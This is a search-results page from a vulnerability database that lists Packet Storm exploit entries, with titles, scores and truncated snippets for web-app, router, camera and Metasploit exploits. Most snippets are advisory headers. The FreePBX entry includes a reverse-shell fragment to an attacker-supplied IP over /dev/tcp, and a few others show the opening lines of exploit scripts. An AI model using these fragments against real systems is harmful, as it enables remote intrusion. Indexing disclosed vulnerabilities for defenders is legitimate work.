Lucene search
K
PacketstormMost viewed

50748 matches found

Packet Storm
Packet Storm
added 2024/10/01 12:0 a.m.345 views

Simple Music Management System 1.0 Arbitrary File Upload

============================================================================================================================================= | Title : Simple Music Management System v1.0 Remote File Upload Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/09/18 12:0 a.m.345 views

Beauty Parlour And Saloon Management System 1.1 Insecure Settings

==================================================================================================================================== | Title : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/09/04 12:0 a.m.345 views

Online Travel Agency System 1.0 Shell Upload

============================================================================================================================================= | Title : Travel v1.0 Remote File Upload Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firefox 125.0.1 64 bits ...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/06/03 12:0 a.m.345 views

FreePBX 16 Remote Code Execution

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/02/05 12:0 a.m.345 views

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting XSS Date: April 18, 2023 Exploit Author: Andreas Finstad 4ndr34z Vendor Homepage: https://www.whatsupgold.com Version: v.22.1.0 Build 39 Tested on: Windows 2022 Server CVE : CVE-2023-35759 Reference:...

6.1CVSS7.4AI score0.0213EPSS
Exploits3
Packet Storm
Packet Storm
added 2024/01/11 12:0 a.m.345 views

PHPJabbers Meeting Room Booking System 1.0 Missing Rate Limiting

Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/meeting-room-booking-system/sectionDemo Version: v1.0 Test...

7.4AI score0.00386EPSS
Exploits2
Packet Storm
Packet Storm
added 2023/12/08 12:0 a.m.345 views

Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFTDEFENDERANTIMALWAREPOWERSHELLAPIUNINTENDEDCODEEXECUTION.txt + twitter.com/hyp3rlinx + x.com/hyp3rlinx + ISR: ApparitionSec Vendor www.microsoft.com Product Windows...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/11/13 12:0 a.m.345 views

Penglead 2.0 SQL Injection

Title: penglead-2.0 SQLi-Bypass Authentication Author: nu11secur1ty Date: 11/10/2023 Vendor: https://www.mayurik.com/ Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download Reference: https://portswigger.net/web-security/sql-injection Description: The id...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/08/30 12:0 a.m.345 views

Apache NiFi H2 Connection String Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache NiFi H2 Connection String Remote Code Execution', 'Description' = %q The DBCPConnectionPool and HikariCPConnectionPool Controller Services...

8.8CVSS7.1AI score0.63633EPSS
Exploits9
Packet Storm
Packet Storm
added 2023/08/04 12:0 a.m.345 views

Canon PIXMA TR4550 1.020 / 1.080 Unencrypted Secret Storage

Advisory ID: SYSS-2023-011 Product: PIXMA TR4550 Manufacturer: Canon Affected Versions: 1.020 / 1.080 also affects many other Canon inkjet printer models4 Tested Versions: 1.020 / 1.080 Vulnerability Type: Insufficient or Incomplete Data Removal within Hardware Component CWE-1301 Insufficiently...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2023/06/23 12:0 a.m.345 views

PHPJabbers Forum Script 3.0 Cross Site Scripting

┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2023/04/03 12:0 a.m.345 views

GeoVision Camera GV-ADR2701 Authentication Bypass

Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass Device name: GV-ADR2701 Date: 26 December , 2020 Exploit Author: Chan Nyein Wai Vendor Homepage: https://www.geovision.com.tw/ Software Link: https://www.geovision.com.tw/download/product/ Firmware Version: V1.0020171215 Tested on...

6.8AI score
Exploits0
Packet Storm
Packet Storm
added 2023/04/03 12:0 a.m.345 views

GLPI Cartography Shell Upload

Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution RCE Date of found: 11 Jun 2022 Application: GLPI Cartography...

9.4AI score0.07746EPSS
Exploits3
Packet Storm
Packet Storm
added 2023/01/05 12:0 a.m.345 views

Linear eMerge E3-Series Access Controller Command Injection

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'Linear eMerge E3-Series Access Controller Command Injection', 'Description' = %q This module exploits a command injection...

10CVSS0.9AI score0.97136EPSS
Exploits16
Packet Storm
Packet Storm
added 2022/12/09 12:0 a.m.345 views

Intel Data Center Manager 5.1 Local Privilege Escalation

RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Intel Data Center Manager Vendor URL: https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.html Type: Incorrect Use of Privileged APIs CWE-648 Date...

10CVSS0.7AI score0.99999EPSS
Exploits351
Packet Storm
Packet Storm
added 2022/09/26 12:0 a.m.345 views

WiFi Mouse 1.8.3.4 Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Wifi Mouse RCE', 'Description' = %q The WiFi Mouse Mouse Server from Necta LLC contains an auth bypass as the authentication is completely...

9.8CVSS9.7AI score0.73475EPSS
Exploits5
Packet Storm
Packet Storm
added 2022/09/23 12:0 a.m.345 views

WordPress WP-UserOnline 2.88.0 Cross Site Scripting

Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting XSS Google Dork: inurl:/wp-content/plugins/wp-useronline/ Date: 2022-08-24 Exploit Author: UnD3sc0n0c1d0 Vendor Homepage: https://github.com/lesterchan/wp-useronline Software Link:...

5.5CVSS5.3AI score0.05094EPSS
Exploits6
Packet Storm
Packet Storm
added 2022/09/22 12:0 a.m.345 views

Bitbucket Git Command Injection

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Bitbucket Git Command Injection', 'Description' = %q Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated...

8.8CVSS0.4AI score0.99174EPSS
Exploits24
Packet Storm
Packet Storm
added 2022/07/18 12:0 a.m.345 views

Backdoor.Win32.HoneyPot.a MVID-2022-0622 Weak Hardcoded Password

Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/e3bb503f9b02cf57341695f30e31128f.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.HoneyPot.a Vulnerability: Weak Hardcoded Password Description: The malware...

Exploits0
Packet Storm
Packet Storm
added 2022/04/07 12:0 a.m.345 views

WordPress WP Downgrade Cross Site Scripting

Tittle: WordPress Plugin WP Downgrade alert/XSS/ Classification Type XSS OWASP top 10 A7: Cross-Site Scripting XSS CWE-79 wpScan: https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba TracWordpress: https://plugins.trac.wordpress.org/changeset/2696091...

5.2AI score0.04782EPSS
Exploits4
Packet Storm
Packet Storm
added 2022/01/10 12:0 a.m.345 views

Online Examination System Project 1.0 SQL Injection

Title: Online Examination System Project 1.0 SQL - Injections Author: nu11secur1ty Date: 01.10.2022 Vendor: https://projectworlds.in/free-projects/php-projects/ Software: https://projectworlds.in/free-projects/php-projects/online-examination/ Description: The eid parameter in account.php from...

0.1AI score
Exploits0
Packet Storm
Packet Storm
added 2021/10/07 12:0 a.m.345 views

Netfilter x_tables Heap Out-Of-Bounds Write / Privilege Escalation

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Netfilter xtables Heap OOB Write Privilege Escalation', 'Description' = %q A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was...

8.3CVSS0.6AI score0.78684EPSS
Exploits21
Packet Storm
Packet Storm
added 2021/02/22 12:0 a.m.345 views

Trojan.Win32.Pincav.cmfl Insecure Permissions

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/9d296ebd6b4f79457fcc61e38dcce61e.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Win32.Pincav.cmfl Vulnerability: Insecure Permissions Description: The trojan creates an...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2020/10/28 12:0 a.m.345 views

aptdaemon File Existence Disclosure

Exploit Title: File Existence Disclosure in aptdaemon " sys.exit0 FILETOCHECK = sys.argv1 bus = dbus.SystemBus aptdbusobject = bus.getobject"org.debian.apt", "/org/debian/apt" aptdbusi...

4.9CVSS5.4AI score0.004EPSS
Exploits3
Packet Storm
Packet Storm
added 2018/02/07 12:0 a.m.345 views

Cisco ASA Crash Proof Of Concept

Cisco ASA CVE-2018-0101 Crash PoC We basically just read: https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf @zerosum0x0, @jennamagius, @alephnaught import requests, sys headers = headers'User-Agent' = 'Open AnyConnect VPN Agent...

9.2AI score0.87397EPSS
Exploits7
Packet Storm
Packet Storm
added 2025/03/31 12:0 a.m.344 views

Litespeed Cache 6.5.0.1 Authentication Bypass

Litespeed Cache version 6.5.0.1 suffers from an authentication bypass vulnerability. Exploit Title: Litespeed unauthorized account takeover Google Dork: if applicable Date: reported on 17 September 2024 Exploit Author: Gnzls Vendor Homepage: https://www.litespeedtech.com/ Software Link:...

9.8CVSS7.5AI score0.83178EPSS
Exploits7
Packet Storm
Packet Storm
added 2024/09/01 12:0 a.m.344 views

Intel AMT Digest Authentication Bypass Scanner

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Intel AMT Digest Authentication Bypass Scanner', 'Description' = %q This module scans for Intel Active Management Technology endpoints and attemp...

10CVSS7.2AI score0.92189EPSS
Exploits7
Packet Storm
Packet Storm
added 2024/08/31 12:0 a.m.344 views

Postfixadmin Protected Alias Deletion

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Postfixadmin Protected Alias Deletion Vulnerability', 'Description' = %q Postfixadmin installations between 2.91 and 3.0.1 do not check if an adm...

3.5CVSS7AI score0.14953EPSS
Exploits2
Packet Storm
Packet Storm
added 2024/07/25 12:0 a.m.344 views

Online Discussion Forum Site 1.0 Insecure Settings

==================================================================================================================================== | Title : Online Discussion Forum Site v1.0 Insecure Settings Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firefox...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/06/14 12:0 a.m.344 views

AEGON LIFE 1.0 SQL Injection

Exploit Title: Life Insurance Management System- SQL injection vulnerability. Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ Version: AEGON...

7.2AI score0.02338EPSS
Exploits5
Packet Storm
Packet Storm
added 2024/01/19 12:0 a.m.344 views

Firefox 121 / Chrome 120 Denial Of Service

Minor firefox DoS - semi silently polluting /Downloads with files part 2 Tested on: firefox 121 and chrome 120 on GNU/linux Date: Thu Jan 18 08:38:28 AM UTC 2024 This is barely a DoS, but since it might affect Chrome too we decided to disclose it. If firefox user visits a specially crafted page,...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/01/18 12:0 a.m.344 views

SpyCamLizard 1.230 Denial Of Service

!/usr/bin/perl use IO::Socket::INET; Exploit Title: SpyCamLizard 1.230 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 18 january 2024 Vendor Homepage: http://www.spycamlizard.com Download to demo:...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2023/08/11 12:0 a.m.344 views

Easy Member Pro 3.0 Insecure Direct Object Reference

==================================================================================================================================== | Title : Easy Member pro v3.0 Unauthorised Administrative Access Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2023/08/04 12:0 a.m.344 views

Webutler 3.2 Shell Upload

Exploit Title: Webutler v3.2 - Remote Code Execution RCE Application: webutler Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://webutler.de/en Software Link: http://webutler.de/download/webutlerv3.2.zip Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technic...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2023/07/28 12:0 a.m.344 views

Western Digital MyCloud Unauthenticated Command Injection

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Western Digital MyCloud unauthenticated command injection', 'Description' = %q This module exploits authentication bypass CVE-2018-17153 and...

10CVSS7.1AI score0.95174EPSS
Exploits7
Packet Storm
Packet Storm
added 2023/07/21 12:0 a.m.344 views

Wifi Soft Unibox Administration 3.0 / 3.1 SQL Injection

Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0" Date: 07/2023 Exploit Author: Ansh Jain @sudoark Author Contact : [email protected] Vendor Homepage: https://www.wifi-soft.com/ Software Link:...

7.1AI score0.02084EPSS
Exploits4
Packet Storm
Packet Storm
added 2023/07/20 12:0 a.m.344 views

Backdrop CMS 1.25.1 Cross Site Scripting

Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting XSS Application: Backdrop Cms Version: v1.25.1 Bugs: Stored Xss Technology: PHP Vendor URL: https://backdropcms.org/ Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip Date of found: 12-07-202...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2023/07/12 12:0 a.m.344 views

Architect HTML And Site Builder 2.2.3 File Upload

==================================================================================================================================== | Title : Architect - HTML and Site Builder V 2.2.3 Remote File Upload vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser :...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2023/06/01 12:0 a.m.344 views

Rukovoditel 3.3.1 CSV Injection

Exploit Title: Rukovoditel 3.3.1 - CSV injection Version: 3.3.1 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 27-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2023/02/15 12:0 a.m.344 views

Korenix JetWave Command Injection / Denial Of Service

CyberDanube Security Research 20230213-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, | JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, | JetWave 2414/2114,...

Exploits0
Packet Storm
Packet Storm
added 2021/04/19 12:0 a.m.344 views

Trojan.Win32.Agent.hsm Insecure Permissions

Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/c58d5aecd223ac95ae5fab6dcd69e953.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Win32.Agent.hsm Vulnerability: Insecure Permissions Description: Agent.hsm creates an insecur...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2021/02/03 12:0 a.m.344 views

Sudo 1.9.5p1 Buffer Overflow / Privilege Escalation

Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation 1 Date: 2021-02-02 Exploit Author: West Shepherd Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1. Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31 CVE :...

1AI score0.99295EPSS
Exploits81
Packet Storm
Packet Storm
added 2021/01/14 12:0 a.m.344 views

Backdoor.Win32.Ketch.i Remote Stack Buffer Overflow

Discovery / credits: malvuln - Malvuln.com c 2021 Original source: https://malvuln.com/advisory/ee314e1b913a09ec86c63d7186d8f0b8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Ketch.i Vulnerability: SEH Remote Stack Buffer Overflow Description: Ketch makes HTTP...

1.4AI score
Exploits0
Packet Storm
Packet Storm
added 2020/10/01 12:0 a.m.344 views

SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure

SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: = 3.4.8 1.0.36274 Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2020/05/19 12:0 a.m.344 views

Protection Licensing Toolkit ReadyAPI 3.2.5 Code Execution / Deserialization

Advisory ID: SYSS-2019-039 Product: Protection Licensing Toolkit, SoapUI/LoadUI/ServiceV Pro Manufacturer: jProductivity LLC, SmartBear Software Affected Versions: - ReadyAPI 3.2.5 Tested Versions: ReadyAPI 3.2.5 Vulnerability Type: Unsafe deserialization/remote code execution CWE-502 Risk Level:...

0.5AI score0.117EPSS
Exploits3
Packet Storm
Packet Storm
added 2019/09/11 12:0 a.m.344 views

eWON Flexy 13.0 Authentication Bypass

! /usr/bin/env python ''' Exploit Title: eWON v13.0 Authentication Bypass Date: 2018-10-12 Exploit Author: Photubias – tijldotDeneutatHowestdotbe for www.ic4.be Vendor Advisory: 1 https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0 2...

0.5AI score
Exploits0
Packet Storm
Packet Storm
added 2025/02/13 12:0 a.m.343 views

ABB Cylon FLXeon 9.3.4 cert.js System Logs Information Disclosure

ABB Cylon FLXeon version 9.3.4 has an issue where an authenticated attacker can access sensitive information via the system logs page of ABB Cylon FLXeon controllers. The logs expose critical data, including the OpenSSL password for stored certificates. This information can be leveraged for furth...

6.9CVSS6.8AI score0.02366EPSS
Exploits7
Packet Storm
Packet Storm
added 2024/11/22 12:0 a.m.343 views

fronsetia 1.1 Cross Site Scripting

Exploit Title: Reflected XSS - fronsetiav1.1 Date: 11/2024 Exploit Author: Andrey Stoykov Version: 1.1 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.html Reflected XSS 1 - "showoperations.jsp" Steps to Reproduce: 1. Visit main page of th...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2024/09/01 12:0 a.m.343 views

Spring Cloud Config Server Directory Traversal

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Directory Traversal in Spring Cloud Config Server', 'Description' = %q This module exploits an unauthenticated directory traversal vulnerability...

7.5CVSS7.4AI score0.95586EPSS
Exploits3
Packet Storm
Packet Storm
added 2024/08/21 12:0 a.m.343 views

Alphaware E-Commerce System 1.0 Code Injection

============================================================================================================================================= | Title : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firef...

7.4AI score
Exploits0
Total number of security vulnerabilities5000